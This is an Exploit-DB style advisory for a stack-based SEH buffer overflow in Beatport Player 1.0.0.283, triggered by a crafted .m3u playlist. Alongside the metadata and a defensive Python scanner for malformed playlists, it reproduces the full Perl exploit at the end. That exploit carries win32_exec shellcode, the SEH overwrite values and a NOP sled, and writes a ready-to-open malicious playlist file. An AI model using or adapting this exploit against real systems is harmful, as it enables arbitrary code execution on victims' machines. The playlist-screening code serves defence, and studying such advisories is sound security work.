Vendor: Beatport Player
By: SirGod The Discover
CVSS: 7,8 (HIGH)
Stack Core Overflow Exploit(SEH)
CWE: 119
Product Name: Beatport Player
Affected Version From: 1.0.0.283
Affected Version To: 1.0.0.283
Patch Exists: Yes
Related CWE: N/A
CPE: a:beatport:beatport_player:1.0.0.283
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)

Beatport Player 1.0.0.283 is vulnerable to a stack-based buffer overflow, triggered by a crafted .m3u playlist file and exploited through an SEH overwrite. The exploit works only on Windows SP2 FR. It is written in Perl and uses a win32_exec shellcode to execute a command. The exploit creates a malicious .m3u file whose single line contains, in order, a junk payload, a next_seh value, a seh value, a short run of NOPs, the shellcode, and a NOP sled.

Mitigation:

Update to the latest version of Beatport Player.
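
Where the player cannot be updated immediately, playlists can be screened before they are opened. The following Python check is an added example, not part of the original advisory or exploit; it flags playlist lines with the shape described above (one very long line, long filler runs, non-text bytes). The thresholds, function names and sample data are assumptions made for illustration.

```python
from __future__ import annotations

import re

MAX_ENTRY_LEN = 1024   # assumption: generous cap for one path or URL entry
MAX_REPEAT_RUN = 64    # assumption: longest plausible run of a single byte
REPEAT_RE = re.compile(rb"(.)\1{%d,}" % MAX_REPEAT_RUN, re.DOTALL)


def inspect_entry(entry: bytes) -> list[str]:
    """Return the reasons one playlist line looks malformed (empty if none)."""
    reasons = []
    if len(entry) > MAX_ENTRY_LEN:
        reasons.append(f"length {len(entry)} > {MAX_ENTRY_LEN}")
    if REPEAT_RE.search(entry):
        reasons.append(f"run of more than {MAX_REPEAT_RUN} identical bytes")
    # Paths, URLs and #EXT directives never need control bytes (tab tolerated).
    if any(b < 0x20 and b != 0x09 for b in entry):
        reasons.append("control bytes")
    return reasons


def scan_playlist(data: bytes) -> dict[int, list[str]]:
    """Map 1-based line numbers to findings for every suspicious line.

    Directive lines starting with '#' are checked as well, because the
    length of any line can matter to a parser with a fixed-size buffer.
    """
    findings = {}
    for lineno, line in enumerate(data.splitlines(), start=1):
        reasons = inspect_entry(line)
        if reasons:
            findings[lineno] = reasons
    return findings


# Constructed samples. BENIGN is an ordinary playlist; MALFORMED only mimics
# the layout (long filler followed by non-text bytes) with inert placeholders.
BENIGN = b"#EXTM3U\r\n#EXTINF:215,Artist - Track\r\nC:\\Music\\track01.mp3\r\n"
MALFORMED = b"A" * 1232 + b"\x01\x02\x03\x04" * 16 + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, scan_playlist(blob) or "clean")
```

A file that trips any of these checks should be quarantined rather than opened in the player; the thresholds should be tuned against the playlists actually seen in the environment.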
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec -  EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh  = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
                    $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
                    "\r\n";
close $playlist;

# milw0rm.com [2009-05-01]